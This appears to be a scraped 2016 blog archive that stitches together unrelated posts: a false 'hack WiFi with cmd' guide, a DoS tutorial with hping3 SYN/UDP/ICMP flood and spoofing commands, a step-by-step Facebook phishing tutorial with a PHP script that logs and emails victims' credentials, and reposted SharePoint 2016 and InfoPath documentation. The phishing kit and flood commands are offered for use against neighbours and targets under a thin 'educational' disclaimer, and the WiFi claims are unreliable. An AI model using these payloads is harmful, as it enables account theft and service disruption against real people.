Tuesday, 19 April 2016

Hack WiFi password using CMD

How to Hack Wifi password using cmd

Hello Friends, In this article we will share some tricks that can help you to hack wifi password using cmd. You can experiment these trick with your neighbors or friends. It’s not necessarily that this trick will work with every wifi because of upgraded hardware. But you can still try this crack with wifi having old modems or routers.
Also, read:
If you want to Increase your Internet speed over a shared Internet network, then head over here. You will find steps to use NetCut, a very popular and free cracking software used to cut Internet connection of users by ARP spoofing hack. It’s quite easy to crack if you follow our steps carefully. This trick will work with most of the wifi devices that have old hardware( modems and routers). For general knowledge, there are two types of wifi keys WEP and WPA. Both are explained below:

1: WEP: Wired Equivalent Privacy (WEP) is one of the widely used security key in wifi devices. It is also the oldest and most popular key and was added in 1999. WEP uses 128 bit and 256-bit encryption. With the help of this tutorial, you can easily get into 128-bit encryption and Hack WiFi password using CMD.

2: WAP and WAP2: Wi-Fi Protected Access is an another version of WiFi encryption and was first used in 2003. It uses the 256-bit encryption model and is tough to hack. WAP2 is an updated version of WAP and was introduced in 2006. Since then it has replaced WAP and is now been used mostly in offices and colleges worldwide.
Below are some steps to hack wifi password using cmd. Follow them carefully and you might get one of your neighbors passwords.


Hacking a Wi-Fi device is not always easy. You have to be careful of so many steps. Otherwise, you might even get caught. For easy and secure hacking, one should use the command prompt (cmd). Cmd is one of the most used features of Windows that gives you access to almost everything on a system. If used properly, you can even get inside other remote systems. To know more about cmd hacking check out our articles here.

Steps to Hack Wifi password using cmd:

1: Open command prompt by going to start and click on run command or enter windows+r, then type cmd and hit Enter
2: In command prompt window, type
netsh wlan show network mode=bssid
hack wifi password using cmd
Hack wifi password
3: This command will show all the available WiFi network in your area
4: This is the last step. Just type:

netsh wlan connect name=(wifi name )

      netsh wlan connect name=Mynet Sata1
and you will be connected to that WiFi network.
5: To disconnect it, type
netsh wlan disconnect
There are many other methods for exploiting a wifi to get its password. You can check them here. Also, note that these tutorials are for educational purpose only. To download WiFi hacking softwares, head to the download section.
5 Tools for Hacking wireless networks that can Actually Hack

Steps to fix Common WiFi problem in Windows

Are you facing difficulties while connecting to the Internet? Is it due to your WiFi or your modem. No Problems, just read the below article to solve the most common WiFi problem.
In this article, we will discuss the most common WiFi problem that occurs in our Internet connection. These problems can be due to a bad ISP, or an ill-configured modem/router. We will discuss all those WiFi problem in details.

How to Fix the most common WiFi problem.

1: I Cannot connect to a Wifi Router?

wifi problem
wifi problem
This is one of the most common WiFI problem faced by most of us. Many times our device shows an error that it is unable to connect to WiFi router. To fix this follow the below steps:

  1. Make sure that your router is configured for Dynamic Host Configuration Protocol (DHCP). Try disabling and re-enabling the DHCP function by:
    1. Open Control Panel in Windows.
    2. Click on the Network and Sharing Center icon.
    3. In the View your active networks section, click the Local Area Connection link.
    4. In the Local Area Connection Status window, click the Properties button.
    5. Highlight the Internet Protocol Version 4 option and click the Properties button.
    6. If you want to enable DHCP, make sure Obtain an IP address automatically is selected, as well as Obtain DNS server address automatically.
  2. Enable/Disable your PC’s modem. Got to Control Panel\All Control Panel Items\Network and Sharing Center and the click on Network connections. Here you will find your Wifi modem listed. Just right click on it and then click on Disable. Wait for a few minutes and then again click on enable(by right clicking on it).
  3. It sill you are facing problems, then restart your Wifi router by unplugging the Router switch for 30 seconds. Plug it again and check your connection.

2: My WiFi is too slow.

wifi problem
wifi problem

Again it’s a headache to browse if the internet connection is too slow. Let’s Fix this now:

  1. Keep your Wifi router away from Electronic items like Microwave ovens, Cordless phones etc.
  2. Change the Wifi channel to 11. You can find this setting by logging into your Wifi modems admin panel.
  3. Disable auto updates in your system. Most of the Internet speed is eaten up by Antivirus programs, Google chrome, and Windows Updates.
  4. Lastly, buy a decent Internet package.You can’t expect a 10 MBPS speed on a 2 Mbps LINE.

3: Internet connection keeps Dropping.

Are you not getting continuous WiFi signal. Is your signal dropping now and then? This is due to the use of splitters in Wifi modem. If you have multiple splitters on an inbound cable connection (tv cables, phone cables etc.), check to see if they are -7dB splitters (will be printed on the outside of splitters). Replace the -7dB splitter that your broadband modem is connected to with a -3.5 dB splitter. Also, check whether you have a proper line of cable connection. Also, keep your WiFi router away from any electronic device.

4: Are you not getting enough WiFi signal.

wifi problem
This may also be the cause of poor internet connection. As discussed earlier, change the WiFi channel to 11. You can do this by logging into the control panel in your browser. Just enter the default Ip address in the address bar of your browser. You can find the Ip address by searching it on google with the modems manufacturer name. Some of the common Ip’s are:
  • Linksys –
  • 3Com –
  • D-Link –
  • Belkin –
  • Netgear –
  • Micromax –

5: No internet connection and an exclamation mark.

This is also a common WiFi problem faced by many of us. 70% of this problem is solved by letting Microsoft Windows to fix it. Just right click on your WiFi indicator and click on Troubleshoot problems. Click next if asked and Windows will try to automatically fix it. If still, there is a problem then restart the WiFi router by unplugging the switch for 30 secs.
Is there any other situations that you are facing with your Wifi router of the network. Comment below and we will try to help you by giving a necessary fix for WiFi problems.

What is DOS attack and how to Hack using DOS


Guys,you may have seen Mr. Robot and remember the event when Fsociety use the DDoS as a calling card to lure Elliot into helping them take down E-Corp or you may have been struck in situation when you try to open a Website  only to see a notification that Website is down. What is this? Yes, this is a DOS Attack.

A denial of service (DoS) attack is an attack that clogs up so much memory on the target system that it can not serve it’s users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.There are several different kinds of dos attack as discussed below:-
1) Ping Of Death :- The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it’s commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses, the ping command in conjuction with -l argument (used to specify the size of the packet sent) to ping the target system that exceeds the maximum bytes allowed by TCP/IP (65,536).
example:- c:/>ping -l 65540 hostname
Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.
2) Teardrop Attack :- Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example you need to send 3,000 bytes of data from one system to another
3) SYN – Flood Attack :- In SYN flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with a SYN/ACK packet but as all the source IP addresses are invalid the target system goes into wait state for ACK message to receive from source. Eventually, due to large number of connection requests, the target systems’ memory is consumed. In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.
4) Land Attack :- A land attack is similar to SYN attack, the only difference being that instead of including an invalid IP address, the SYN packet include the IP address of the target sysetm itself. As a result an infinite loop is created within the target system, which ultimately hangs and crashes.Windows NT before Service Pack 4 are vulnerable to this attack.
5) Smurf Attack :- There are 3 players in the smurf attack–the attacker,the intermediary (which can also be a victim) and the victim. In most scenarios the attacker spoofs the IP source address as the IP of the intended victim to the intermediary network broadcast address. Every host on the intermediary network replies, flooding the victim and the intermediary network with network traffic.
Result:- Performance may be degraded such that the victim, the victim and intermediary networks become congested and unusable, i.e. clogging the network and preventing legitimate users from obtaining network services.
DOS attack
6) UDP – Flood Attack :- Two UDP services: echo (which echos back any character received) and chargen (which generates character) were used in the past for network testing and are enabled by default on most systems. These services can be used to launch a DOS attack by connecting the chargen to echo ports on the same or another machine and generating large amounts of network traffic.
Distributed Denial Of Service (DDoS) :- In Distributed DoS attack, there are 100 or more different attackers (systems) attacking the single system. Due to higher number of attackers DDoS attack is more effective and dangerous than regular DoS attack. The attackers have control over master zombies, which, in turn, have control over slave zombies, as shown in figure.
No system connected to the internet is safe from DDoS attacks. All platforms, including Unix and Windows NT, are vulnerable to such attacks. Even Mac OS machines have been used to conduct DDoS attacks.

The most popular DDoS and dos attack tools are:-

a) Trin00 (WinTrinoo)
b) Tribe Flood Network (TFN) (TFN2k)
c) Shaft
No softwares, you wanna try it yourself, you can use HPING(comes preinstalled in KALI LINUX).

Steps to hack using DOS attack:

Open the console and go to the path of hping3 and give the following command.
hping3 –rand-source –S –L 0 –p <target port> <target IP>
Here we are sending SYN packets (set value by replacing 0) with a random source.
hping3 –rand-source –SA –p <open port> <target IP>
Here we are sending SYN + ACK packets from a random source.
hping3 –rand-source -–udp <target IP> –flood
Flooding the target IP with UDP packets.
hping3 –rand-source –SAFRU –L 0 –M 0 –p <port> <target> –flood
In this command, we are sending SYN+ACK+FIN+RST+URG packets with TCP ack (-L) and TCP seq (-M). Change the values after -L and -M.
hping3 –icmp –spoof –flood
Flooding with ICMP packets by spoofed IP (–spoof).


How to hack facebook password instantly using Phishing

How to hack facebook password instantly?

So you may be wondering if it is possible to hack Facebook account or not. We all know that Facebook has a very tight security system. Hence, it is almost impossible to directly hack Facebook account. Therefore, we will introduce you to an indirect method for how to hack facebook password instantly. This method is known as Phishing.
Phishing is a hacking method in which one creates a fake website to lure the victim into entering his/her Username and password. Therefore, the user has to create a genuine looking fake website to fool his victim. Hence, this fake website steals the login information of the victims.
Phishing is used by most of the hackers to steal personal information. Also, phishing is a very accurate and successful tool of hacking. Hence, you can easily rely on the working of this method.

How will Phishing work?

First of all, you have to create a website that looks genuine as of Facebook. Note that this fake website will actually redirect the victim to the original Facebook website. Now you have to send the link to your victim so that he can use the fake website and login in it. To store the Login information you have to access a web host server.
Below you will find important steps that will help you for “how to hack facebook password instantly” using Phishing.

How to hack facebook password instantly using Phishing:

view Facebook private Profile Photo hack facebook password instantly
hack facebook password instantly

To create a fake website, you need a Web host and a website. Hence, we will create a website and add it to our host provider. To do so you will have to register at “www.000webhost.com” since it is a free website provider. You may also choose any other website. Go to this website and create your account. After creating the account, choose the desired name for the website and confirm it. Let say that we created a website named www.xyzhacking.com
Now visit www.facebook.com and go to its Login page. Right click on the browser and choose “view page source”. You will get the source code for that login page. Copy it temporarily in notepad.
Now visit the website of Notepad++ here. Download the software named as Notepad++. This software will help you to convert the source code to a fake website. After installing Notepad++,open it and paste the copied source code files.

Search for the word “action” to find the below line:

<form id=”login_form” action=”https://www.facebook.com/login.php?login_attempt=1” method=”post” onsubmit=”return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)”>

Replace the above link in BOLD letters with http://xyzhacking.com/mail.php. Change “xyzhacking” with the name of your newly created website. Now save this file as index.php.

Now you will have to create another file named mail.php. Below is the code to create this file. Just copy it and paste it in notepad++ ,then save it with the name “mail.php”. Replace all the links with the name of your website. This file will save all the credentials entered by the victim.

<?php header (‘Location: http://visititsoon.comlu.com/index.html’); $posts = ‘http://visititsoon.comlu.com/index.html’;
foreach($_POST as $k => $v){
$posts .= ‘$_POST[‘.$k.’] = ‘.$v.”\n”;
$posts .= “——————————————\n”;
$emailto = ”;
$from = “”;
$body = ‘ ‘.
$posts.’ ‘;
@mail($emailto, $subject, $body, $from);
$handle = @fopen(“pass.txt”, “a+”);
@fwrite($handle, $posts);
Now you are ready with both the files index.php and mail.php. You can easily attack your victim with fake website and hack facebook password instantly. Now upload these files to your website host. Check this video for more information.

Now you are ready with a fake Facebook website. When the target will enter his information, it will be saved at mail.php file. But getting the target to click on your fake Facebook page is a tough task. Hence, you will have to lure him into clicking on the fake link.

You can see the username and password by going to your hosting provider File manager and checking for a pass.php file. If it is not there, then you can check your mail.php file too.

hack facebook password instantly
hack facebook password instantly
NOTE: Phishing is a crime and can lead you to spend your rest of the life in Jail. Hence, proceed with precaution. This article about how to hack facebook password instantly is for educational purpose only. To let the users know the harmful effects of hacking. Also, browse our Downloads section for more hacking software.

New and improved features in SharePoint Server 2016

The following table provides a summary of the new features that you can try out in this SharePoint Server 2016 release.


Feature Description More information
Access Services
New Access features are available when you deploy Access Services in SharePoint Server 2016 .
For more information, see Access Services.
Compliance features
New compliance features for SharePoint Server 2016 include the document deletion and in-place hold policies.
For more information, see Compliance features.
Customized web parts
The compile time for customized XSLT files used for Content Query, Summary Links, and Table of Contents Web Parts is improved.
Document Library accessibility
SharePoint Server 2016 includes new document library accessibility features.
For more information, see Document Library accessibility.
Durable links
Resource-based URLs now retain links when documents are renamed or moved in SharePoint.
Encrypted Connections
SharePoint Server 2016 supports TLS 1.2 connection encryption by default.
For more information, see Encrypted Connections.
Fast Site Collection Creation
The Fast Site Collection Creation feature is a rapid method to create site collections and sites in SharePoint.
For more information, see Fast Site Collection Creation.
Filenames - expanded support for special characters
SharePoint Server 2016 now supports using some special characters in file names that were blocked in previous versions.
For more information, see Filenames.
Hybrid in SharePoint 2016
Hybrid in SharePoint Server 2016 enables you to integrate your on-premises farm with Office 365 productivity experiences, allowing you to adopt the cloud at your own pace.
For more information, see Hybrid in SharePoint 2016.
Identify and search for sensitive content
SharePoint Server 2016 now provides the same data loss prevention capabilities as Office 365.
For more information, see Identify and search for sensitive content in both SharePoint 2016 and OneDrive documents.
Image and video previews
You can now preview images and videos in SharePoint Server 2016 document libraries.
For more information, see Image and Video previews.
Information Rights Management
SharePoint Server 2016 provides Information Rights Management (IRM) capabilities to secure information by encrypting and securing information on SharePoint libraries with OneDrive for Business.
For more information, see Information Rights Management.
Large file support
SharePoint Server 2016 now supports uploading and downloading files larger than 2,047 MB.
For more information, see Large file support.
MinRole is a new feature in SharePoint Server 2016 that allows a SharePoint farm administrator to define each server’s role in a farm topology.
For more information, see MinRole farm topology.
Mobile experience
SharePoint Server 2016 offers an improved mobile navigation experience.
For more information, see Mobile experience.
New controls for working with OneDrive for Business
SharePoint Server 2016 provides controls at the top of your personal document folders that make common tasks in OneDrive for Business more accessible.
For more information, see New controls for working with OneDrive for Business.
New Recycle Bin in OneDrive and Team sites
SharePoint Server 2016 adds a link for the Recycle Bin in the left navigation area of the OneDrive and Team sites.
Open Document Format (ODF)
SharePoint Server 2016 adds support for Open Document Format (ODF) files to use in document library templates.
For more information, see Open Document Format (ODF) available for document libraries.
Project Server
New Project Server features are available in SharePoint Server 2016.
For more information, see Project Server.
ReFS file system support
SharePoint Server 2016 now supports drives that are formatted with the ReFS file system.
For more information about the ReFS file system, see Resilient File System Overview and Resilient file system.
SharePoint business intelligence
SharePoint Server 2016 now supports SQL Server 2016 CTP 3.1 and the Power Pivot add-in and Power View.
For more information about SharePoint business intelligence, see Power Pivot add-in and Power View are now available to use with SharePoint Server 2016 Beta 2.
SharePoint Search
SharePoint Search Server Application has significant changes to its deployment.
For more information, see SharePoint Search Server Application.
Sharing improvements
SharePoint Server 2016 has many new sharing improvements available.
For more information, see Sharing improvements.
Site Folders view
SharePoint Server 2016 provides a new Site Folders view that lets you access the document libraries in sites that you're following.
For more information, see Site Folders view.
Sites page pinning
This new feature helps you see and follow sites.
For more information, see Sites page pinning.
SMTP Connection Encryption
SharePoint Server 2016 supports sending email to SMTP servers that use STARTTLS connection encryption.
For more information, see SMTP Connection Encryption.
SMTP ports (non-default)
SharePoint Server 2016 adds support for SMTP servers that use TCP ports other than the default port (25).
For more information, see Use SMTP ports other than the default (25).
Web Application Open Platform Interface Protocol (WOPI)
You can now rename files, create new files, and share files from within the WOPI iframe on the browser page.

This section provides detailed descriptions of the new and updated features in SharePoint Server 2016.

The following new Access features are available when you deploy Access Services in SharePoint 2016:

SharePoint Server 2016 Central Administration is now provisioned on the first server in a farm by default when using the SharePoint Products Configuration Wizard. Central Administration is not provisioned on additional servers in a farm by default.
You can provision or unprovision Central Administration on individual servers in a farm, no matter what the server role is by using the following methods:
The state of Central Administration does not affect whether a server is considered compliant with MinRole. The MinRole health rule will not attempt to provision or unprovision Central Administration.

The document deletion policy allows you to delete documents in users' OneDrive for Business sites after specific periods of time. The In-Place Hold policy allows administrators to preserve documents, email, and other files.
For more information, see Overview of document deletion policies.

The following features are now available for working in SharePoint Server 2016 document libraries:
  • Landmarks to a page make it easier to navigate, and there are alt text improvements for all major navigation links.
  • Keyboard shortcuts are provided for the following document tasks:
    • Alt + N - New
    • Alt + E - Edit
    • Alt + U - Upload
    • Alt + M - Manage
    • Alt + S - Share
    • Alt + Y - Synchronization
  • Focus improvements, such as keeping focus on prior elements and focus trapping.
  • Announcements for upload progress.
  • Announcements for file name and file types when browsing folder and file lists.
  • Improved callout reading.
  • Fixed use of color issues for views switcher.
  • Updates to the Help documentation.

When you set up an SSL binding in Internet Information Services (IIS) Manager to host your web application, SharePoint uses TLS 1.2 connection encryption if your client application supports it. SharePoint also supports TLS 1.2 connection encryption when connecting to other systems, for example when crawling websites.
A security vulnerability was identified in the SSL 3.0 protocol that can allow an attacker to decrypt data. For enhanced security, some SharePoint features now disable SSL 3.0 connection encryption by default, as well as certain encryption algorithms (for example RC4) with known weaknesses.
SharePoint Preview customers should test all of their SSL/TLS/HTTPS connection scenarios with SharePoint Server 2016. We recommend that connection testing includes any third-party software that might integrate with SharePoint Server 2016.

This new feature provides templates that work at same level as SQL Server, which reduces the round trips required between the SharePoint and SQL servers. Use the SPSiteMaster Windows PowerShell cmdlets to create sites and site collections quickly, see Use Windows PowerShell cmdlets to manage sites in SharePoint Server 2016.

SharePoint has historically blocked file names that included the &, ~, {, and } characters, file names that contained a GUID, file names with leading dots, and file names longer than 128 characters. These restrictions are removed in SharePoint Server 2016 and are now available to use.
Restricted characters such as % and # are still not allowed in file names.

In SharePoint Server 2016, new hybrid features are available to enable hybrid solutions.
Hybrid sites
Hybrid sites features allows your users to have an integrated experience while using SharePoint Server and SharePoint Online sites:
  • Users can follow SharePoint Server and SharePoint Online sites, and see them consolidated in a single list.
  • Users have a single profile in Office 365, where all of their profile information is stored.
For more information, see Plan for hybrid sites features.
Hybrid OneDrive for Business
Hybrid sites features are used in concert with Hybrid OneDrive for Business (introduced in SharePoint Server 2013 with Service Pack 1 (SP1)):
  • Users can sync files with Office 365 and share them with others.
  • Users can access their files directly through Office 365 from any device.
Cloud hybrid search
Cloud hybrid search is a new hybrid search solution alternative. With cloud hybrid search:
  • You index all of your crawled content, including on-premises content, to your search index in Office 365. You can set up the crawler in SharePoint Server 2016 to crawl the same content sources and use the same search connectors in Office SharePoint Server 2007, SharePoint Server 2010, and SharePoint Server 2013.
  • When users query your search index in Office 365, they get unified search results from both on-premises and Office 365 content.
For more information about cloud hybrid search, see the public Microsoft cloud hybrid search program on Microsoft Office connection.
For more information, see Plan for hybrid OneDrive for Business.
For more information about the hybrid solutions available today, please visit the SharePoint Hybrid Solutions Center.

With this new capability, you can:
  • Search for sensitive content across SharePoint Server 2016, SharePoint Online, and OneDrive for Business.
  • Leverage 51 built-in sensitive information types (credit cards, passport numbers, Social Security numbers, and more).
  • Use DLP Queries from the eDiscovery site collection to discover sensitive content relating to common industry regulations from the SharePoint eDiscovery Center, identify offending documents, and export a report.
  • Turn on DLP Policies from the Compliance Policy Center site collection to notify end users and administrators when documents with sensitive information are stored in SharePoint and automatically protect the documents from improper sharing.
Information on configuring and using this feature is documented in SharePoint Online and Office 365. For more information, see:

In SharePoint Server 2016 when you post images and videos to a document library, you can see a preview by hovering the mouse over the image or video, or by clicking on them.

Previous versions of SharePoint did not support uploading or downloading files larger than 2,047 MB. SharePoint 2016 now allows you to upload or download larger files. You can configure the desired maximum file-size limit on a per-web application basis in your SharePoint farm.

The role of a server is specified when you create a new farm or join a server to an existing farm. SharePoint automatically configures the services on each server based on the server role, optimizing the performance of the farm based on that topology. There are six predefined server roles that are available, as shown in the following table.


Server roleDescription
Front-endService applications, services, and components that serve user requests belong on front-end web servers. These servers are optimized for low latency.
ApplicationService applications, services, and components that serve back-end requests, such as background jobs or search crawl requests, belong on Application servers. These servers are optimized for high throughput.
Distributed CacheService applications, services, and components that are required for a distributed cache belong on Distributed Cache servers.
SearchService applications, services, and components that are required for search belong on Search servers.
CustomCustom service applications, services, and components that do not integrate with MinRole belong on Custom servers. The farm administrator has full control over which service instances can run on servers assigned to the Custom role. MinRole does not control which service instances are provisioned on this role.
Single-Server FarmService applications, services, and components required for a single-machine farm belong on a Single-Server Farm. A Single-Server Farm is meant for development, testing, and very limited production use. A SharePoint farm with the Single-Server Farm role cannot have more than one SharePoint server in the farm.
The Standalone Install mode is no longer available in SharePoint Server 2016. The Single-Server Farm role replaces the Standalone Install mode available in previous SharePoint Server releases. Unlike Standalone Install, the SharePoint administrator must separately install and prepare Microsoft SQL Server for SharePoint. The SharePoint administrator must also configure the SharePoint farm services and web applications, either manually or by running the Farm Configuration Wizard.
For more information about the MinRole feature, see MinRole overview.

When you use a mobile device to access the home page for a SharePoint Server 2016 team site, you can tap tiles or links on the screen to navigate the site. You can also switch from the mobile view to PC view, which displays site pages as they are seen on a client computer. This view is also touch enabled.

You can click a control to create new Office documents, upload files, synchronize your files for offline use, and share your files. For more information, see “Simple controls” on The OneDrive Blog.

The Open Document Format (ODF) enables you to create new files in a document library and save as ODF files so that users can edit the new file with a program they choose. For more information, see Set Open Document Format (ODF) as the default file template for a library.

Project Server 2016 for SharePoint Server 2016 has many new capabilities and features. For more information, see What's new for IT pros in Project Server 2016.
Project Server 2016 is installed with SharePoint Server 2016 Enterprise, though is licensed separately. For more information about Project Server licensing, see Licensing Project.
CSOM improvements have been made to scale and performance that cover the gap between object model and the PSI.

SQL Server 2016 CTP 3.1 is now available. You can now download SQL Server 2016 CTP 3.1 to use the Power Pivot for SharePoint add-in. You can also use Power View by installing SQL Server Reporting Services (SSRS) in SharePoint-integrated mode and the SSRS front-end add-in from the SQL Server installation media.
Download SQL Server 2016 CTP 3.1 from Microsoft Download Center.
The following SharePoint Server 2016 business intelligence features are available when you upgrade to SQL Server 2016 CTP 3.1:
  • Power Pivot Gallery
  • Scheduled Data Refresh
  • Workbooks as a Data Source
  • Power Pivot Management Dashboard
  • Power View reports
  • Power View Subscriptions
  • Report Alerting
For more information, download the new Deploying SQL Server 2016 PowerPivot and Power View in SharePoint 2016 white paper. For details about configuring and deploying business intelligence in a multiple server SharePoint Server 2016 farm, download Deploying SQL Server 2016 PowerPivot and Power View in a Multi-Tier SharePoint 2016 Farm.

SharePoint Request Manager now provisions on the server roles shown in the following list, to support both throttling and routing scenarios:
  • Application
  • Distributed Cache
  • Front-End
Additionally, the Request Manager service will no longer prevent sites from rendering when the service is enabled while you have no routing rules defined.

The following list shows the sharing improvements that are available for SharePoint Server 2016:

SharePoint Search supports indexing of up to 500 million items per Search Server application.

We've simplified the process for configuring Central Administration to use SSL bindings. The following command parameters are now available to use:
  • New-SPCentralAdministration -Port <number> -SecureSocketsLayer
  • Set-SPCentralAdministration -Port <number> -SecureSocketsLayer
  • Psconfig.exe -cmd adminvs -port <number> -ssl
You must assign a server certificate to the Central Administration IIS web site by using the IIS administration tools. The Central Administration web application won’t be accessible until you do this.
If you specify port 443, it will automatically create an SSL binding instead of an HTTP binding even if you don’t include the SecureSocketsLayer or SSL parameters.
The Central Administration public AAM URL will be automatically updated to use the appropriate protocol scheme, server name, and port number.

There are three options available for upgrading site collections. For more information, see Upgrade from SharePoint 2013 to SharePoint Server 2016 Release Candidate.

The following list shows the SharePoint 2016 requirements that are needed to negotiate connection encryption with an SMTP server:
  1. STARTTLS must be enabled on the SMTP server.
  2. The SMTP server must support the TLS 1.0, TLS 1.1, or TLS 1.2 protocol.
    SSL 2.0 and SSL 3.0 protocols are not supported.
  3. The SMTP server must have a server certificate installed.
  4. The server certificate must be valid. Typically, this means that the name of the server certificate must match the name of the SMTP server provided to SharePoint. The server certificate must also be issued by a certificate authority that is trusted by the SharePoint server.
  5. SharePoint must be configured to use SMTP connection encryption.
To configure SharePoint to always use SMTP connection encryption, open the SharePoint Central Administration website and browse to System Settings > Configure outgoing e-mail settings and set the Use TLS connection encryption drop-down menu to Yes. To configure SharePoint to always use SMTP connection encryption in Windows PowerShell, use the Set-SPWebApplication cmdlet without the DisableSMTPEncryption parameter. For example:
$WebApp = Get-SPWebApplication -IncludeCentralAdministration | ? { $_.IsAdministrationWebApplication -eq $true }

Set-SPWebApplication -Identity $WebApp -SMTPServer smtp.internal.contoso.com -OutgoingEmailAddress sharepoint@contoso.com -ReplyToEmailAddress sharepoint@contoso.com
To configure SharePoint to never use SMTP connection encryption in SharePoint Central Administration, browse to System Settings > Configure outgoing email settings and set the Use TLS connection encryption drop-down menu to No. To configure SharePoint to never use SMTP connection encryption in Windows PowerShell, use the Set-SPWebApplication cmdlet with the DisableSMTPEncryption parameter. For example:
$WebApp = Get-SPWebApplication -IncludeCentralAdministration | ? { $_.IsAdministrationWebApplication -eq $true }

Set-SPWebApplication -Identity $WebApp -SMTPServer smtp.internal.contoso.com -DisableSMTPEncryption -OutgoingEmailAddress sharepoint@contoso.com -ReplyToEmailAddress 
If SharePoint is configured to use SMTP connection encryption, it will only send email messages if it successfully negotiates connection encryption with the SMTP server. It will not fall back and send email messages unencrypted if connection encryption negotiation fails. If SharePoint is not configured to use SMTP connection encryption, it will always send email messages unencrypted, even if the SMTP server supports connection encryption.

You can now pin sites that you see on the sites page. A pinned site shows at the top of the list of sites that you're following.

For more information, see "Site folders" in The OneDrive Blog.

You can now apply themes to your Suite Navigation.

To configure SharePoint to use a non-default SMTP port open SharePoint Central Administration, browse to System Settings > Configure outgoing email settings, and set the SMTP server port to the port number of your SMTP server. To configure SharePoint to use a non-default SMTP port in Windows PowerShell, use the Set-SPWebApplication cmdlet with the SMTPServerPort <port number> parameter. For example:
$WebApp = Get-SPWebApplication -IncludeCentralAdministration | ? { $_.IsAdministrationWebApplication -eq $true }

Set-SPWebApplication -Identity $WebApp -SMTPServer smtp.internal.contoso.com -SMTPServerPort 587 -OutgoingEmailAddress sharepoint@contoso.com -ReplyToEmailAddress 
sh  arepoint@contoso.com

Saturday, 9 April 2016

Building SharePoint Applications with InfoPath 2010 (Part 1 of 2)

Microsoft InfoPath 2010 enables an organization to build robust end-to-end Microsoft SharePoint applications. When combined with InfoPath Forms Services in Microsoft SharePoint Server 2010, InfoPath 2010 empowers you to automate your own business processes that collect, manage, and share information. As an IT professional or developer, you can create a powerful business application by using declarative logic (no code) on the SharePoint platform by using InfoPath forms to interact with external data and drive workflows. This article describes best practices for building SharePoint applications by using InfoPath 2010; part two of this article contains a sample walkthrough for a hardware request scenario.

When building a SharePoint application, you must answer some basic questions about your end-to-end scenario. Is there a requirement for users to work while disconnected from the corporate network? How will data that is collected by forms eventually be stored? What external data sources must be pulled into the solution?
In identifying answers to these questions, you will have a better idea of what the complete application architecture will resemble. But how do you know when InfoPath 2010 is the best solution for your business problem? This section examines some other options that you might consider when you build a SharePoint application. Then, for InfoPath solutions, this section reviews the decision tree for selecting the correct form template. Figure 1 shows the architecture decision tree for a SharePoint application that uses InfoPath 2010 and serves as an overview for this section.
Figure 1. Architecture decision tree for a SharePoint application that uses InfoPath 2010

Architecture decision tree

Choosing Whether to Use InfoPath 2010

As the previous figure showed, there are other technologies to consider when you implement forms in a SharePoint application. The following list describes several of these options:
  • Microsoft Word 2010 documents
  • Microsoft Access 2010 forms
  • Microsoft ASP.NET Web Forms
Table 1 offers a quick comparison between InfoPath 2010 and these other options across different areas. Table 2 provides a summary analysis based on the size and complexity of a SharePoint application. The subsections that follow give more details about each application.
Table 1. Comparing InfoPath 2010 to other form applications
What is the technical level of the individual building the form?
Information Worker
Information Worker
Information Worker
What kinds of controls are supported?
How are external data connections added?
Either with custom code or an embedded Document Information Panel
With custom code
What kind of custom code can be used?
Microsoft Visual Basic or C#
VBA or add-ins created by using Microsoft Visual Studio, which must be installed on users' computers
Any .NET or scripting language
Does the application support browser scenarios?
Does the application have an offline client?
How are printing requirements addressed?
Export to PDF or XPS, print views, or custom code to generate a document
WYSIWYG editor or export to PDF or XPS
Export to PDF or XPS
Custom code to generate a document
Is there integration with SharePoint workflow?
How is the form deployed?
Either as a SharePoint list, published to a form library, or published as a SharePoint content type; administrator-deployed forms are uploaded to InfoPath Forms Services
As a SharePoint content type
Published to Access Services
Through Visual Studio
Table 2. Application recommendations depending on the solution type
Solution Type
Simple complexity, form data that is stored as client files
Simple complexity, form data that is stored as list items
Moderate complexity, without workflow
Moderate complexity, with workflow
High complexity

Microsoft Word 2010

With the introduction of the Microsoft OfficeOpen XML Formats in the 2007 release, Microsoft Word became a reasonable alternative for client form scenarios that collect rich content. By using the file formats, a Word document now consists of a ZIP archive, which contains several document parts. The archive can include a custom XML part that defines a specific data source. You can then add content controls to your document that are bound to nodes in the custom XML part. You can prevent the user from editing content outside these controls by grouping the document or different sections of the document. Essentially, grouping encloses selected content in a read-only content control. A grouped document acts more like a form, because the user is forced to enter data within the content controls that are bound to nodes in the custom XML part. If you create a SharePoint content type that uses a Word document template, SharePoint automatically creates the custom XML part in the archive, with the nodes bound to any site/list columns that you define for the content type. Thus, the combination of editable content controls and integration with content types enables Word to be a practical option for SharePoint applications.

Microsoft Access 2010

Microsoft Access 2010 is a relational database application that can aggregate multiple external data sources into a single location. You can connect to a SharePoint list, web service, XML file, and other sources. You can also export tabular data to a variety of formats, such as a SharePoint list, HTML document, Word document, or Microsoft Excel 2010 workbook. An Access form is a simple way to add records to database tables. You can easily create a form from an Access table, and then use layout tools to add existing table fields, controls, and conditional formatting as needed. By using a single click in Access 2010, you can also publish the database to Access Services as a SharePoint application. Publishing the database makes all tables, forms, reports, queries, and macros available in a browser, and provides storage in a central SharePoint location. Before publishing, you can run the compatibility checker in Access 2010 to ensure that items and settings in the database are supported on the web.

ASP.NET Web Forms

If you want to build a robust web application that integrates SharePoint, an ASP.NET Web Form offers the most flexibility. You create an ASP.NET Web Form as a combination of HTML and controls that execute on a web server. Working in Microsoft Visual Studio 2010, you can drop controls onto forms and then double-click those controls to write custom event handlers. Built on the Common Language Runtime (CLR), ASP.NET enables you to write code by using any supported .NET Framework language or scripting language. A developer who is building an ASP.NET Web Form has full access to the SharePoint object model and a large selection of controls.

Selecting the Right InfoPath Form Template

